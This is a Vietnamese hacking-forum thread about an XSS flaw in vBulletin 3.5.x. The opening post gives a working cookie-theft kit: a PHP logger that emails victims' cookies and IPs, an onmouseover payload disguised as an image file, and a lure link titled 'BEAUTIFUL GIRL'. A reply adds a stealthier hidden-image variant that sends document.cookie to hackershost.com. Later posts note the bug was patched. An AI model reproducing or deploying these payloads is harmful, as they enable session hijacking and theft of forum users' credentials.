lỗi XSS của vBulletin3.5.x

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

lỗi XSS của vBulletin3.5.x

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 08:05:21 (+0700) \| #1 \| 12823

hinavietnam
Member

Joined: 02/08/2006 14:42:18
Messages: 16
Location: Japan
Offline

--------------------------------------------------------------------

Name file: exploit.php

--------------------------------------------------------------------

<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>

--------------------------------------------------------------------

<?php
$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------

( 2 )

--------------------------------------------------------------------

Name file: image.gif

--------------------------------------------------------------------

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >

--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------

( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for

--------------------------------------------------------------------

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 09:07:01 (+0700) \| #2 \| 12833

Luke
Elite Member

Joined: 05/09/2002 13:21:20
Messages: 83
Offline

Nếu đã tấn công XSS thì không nên làm thế này.
Quá lộ liễu, và có thể bị người khác "châm"
Nên làm thế này
Code:

onmouseover="LukesObj=document.createElement('img'); LukesObj.style.width=1;LukesObj.style.height=1;LukesObj.src= 'http://hackershost.com/log.php?cookie'=document.cookie; document.body.insertBefore(LukesObj);"

Thử mà xem smilie

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 10:39:46 (+0700) \| #3 \| 12858

t0ny4n
Member

Joined: 03/07/2006 10:47:01
Messages: 40
Offline

Luke wrote:

Nếu đã tấn công XSS thì không nên làm thế này.
Quá lộ liễu, và có thể bị người khác "châm"
Nên làm thế này
Code:
onmouseover="LukesObj=document.createElement('img'); LukesObj.style.width=1;LukesObj.style.height=1;LukesObj.src= 'http://hackershost.com/log.php?cookie'=document.cookie; document.body.insertBefore(LukesObj);"
Thử mà xem

Em vẫn chưa rõ lắm về cái này, bro có thể chỉ dùm thêm + cách thức hoạt động kô?

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 11:26:31 (+0700) \| #4 \| 12887

Luke
Elite Member

Joined: 05/09/2002 13:21:20
Messages: 83
Offline

google: XSS attack
google: javascript: createElement

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 12:13:01 (+0700) \| #5 \| 12902

hinavietnam
Member

Joined: 02/08/2006 14:42:18
Messages: 16
Location: Japan
Offline

Luke wrote:

Nếu đã tấn công XSS thì không nên làm thế này.
Quá lộ liễu, và có thể bị người khác "châm"
Nên làm thế này
Code:
onmouseover="LukesObj=document.createElement('img'); LukesObj.style.width=1;LukesObj.style.height=1;LukesObj.src= 'http://hackershost.com/log.php?cookie'=document.cookie; document.body.insertBefore(LukesObj);"
Thử mà xem

Ok, kiểu của ông anh quả hiệu quả hơn nhiều. Em sẽ tiếp thu và học hỏi

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 20:11:33 (+0700) \| #6 \| 12931

BigballVN
Elite Member

Joined: 12/06/2005 07:25:21
Messages: 610
Offline

Rốt cục cũng không có cách nào lấy được pass Admin. Chỉ có cookie cũng ko làm gì được nhiều. Chắc có nước vô forum del bài smilie

)

[Question] lỗi XSS của vBulletin3.5.x	07/08/2006 21:43:05 (+0700) \| #7 \| 12943

msdn
Member

Joined: 23/06/2006 06:27:14
Messages: 214
Offline

Lỗi này xuất hiện này xuất hiện vào khoãng cuối tháng 04/2006 và hiện tại đã có security path cho nó từ rất lâu .

Thân

Go to:

Users currently in here
1 Anonymous